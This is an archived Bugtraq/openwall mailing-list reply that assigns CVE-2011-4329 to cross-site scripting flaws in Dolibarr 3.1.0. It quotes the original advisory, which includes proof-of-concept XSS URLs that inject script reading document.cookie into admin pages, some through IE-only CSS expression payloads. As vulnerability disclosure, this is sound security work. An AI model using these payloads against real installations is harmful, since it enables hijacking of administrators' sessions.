lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <20111121163238.GA18979@foo.fgeek.fi>
Date: Mon, 21 Nov 2011 18:32:38 +0200
From: Henri Salo <henri@...v.fi>
To: security@...oserve.de
Cc: bugtraq@...urityfocus.com
Subject: Re: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0

On Wed, Nov 09, 2011 at 09:59:18AM +0000, security@...oserve.de wrote:
> Advisory:               Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
> Advisory ID:           	INFOSERVE-ADV2011-03
> Author:                	Stefan Schurtz
> Contact:		security@...oserve.de
> Affected Software:  	Successfully tested on Dolibarr 3.1.0 other versions may also be affected
> Vendor URL:          	http://www.dolibarr.org/
> Vendor Status:       	fixed in the 3.1 branch
> 
> ==========================
> Vulnerability Description
> ==========================
> 
> Dolibarr 3.1.0 is prone to multiple XSS vulnerability
> 
> ==================
> PoC-Exploit
> ==================
> 
> Cross-Site-Scripting - parameter 'username'
> 
> http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script>
> http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script>&=3&optioncss=print
> 
> IE-only
> 
> http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
> http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie))
> http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie))
> 
> =========
> Solution:
> =========
> 
> Fixed in the 3.1 branch
> 
> ====================
> Disclosure Timeline:
> ====================
> 
> 08-Nov-2011 - vendor informed
> 09-Nov-2011 - vendor fix in the 3.1 branch
>  
> ========
> Credits:
> ========
> 
> Vulnerabilities found and advisory written by INFOSERVE Security Team
> 
> ===========
> References:
> ===========
> 
> https://doliforge.org/tracker/?func=detail&aid=232&group_id=144
> https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4207e78a1
> http://www.dolibarr.org/
> http://www.infoserve.de/

CVE-2011-4329 is assigned for this issue.

Best regards,
Henri Salo

Powered by blists - more mailing lists